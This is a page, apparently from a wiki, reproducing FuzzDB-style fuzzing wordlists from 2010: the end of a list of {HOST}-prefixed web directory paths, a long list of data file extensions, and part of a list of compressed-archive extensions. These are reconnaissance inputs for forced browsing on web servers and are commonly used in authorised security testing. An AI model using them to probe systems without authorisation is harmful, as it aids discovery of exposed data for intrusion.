{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
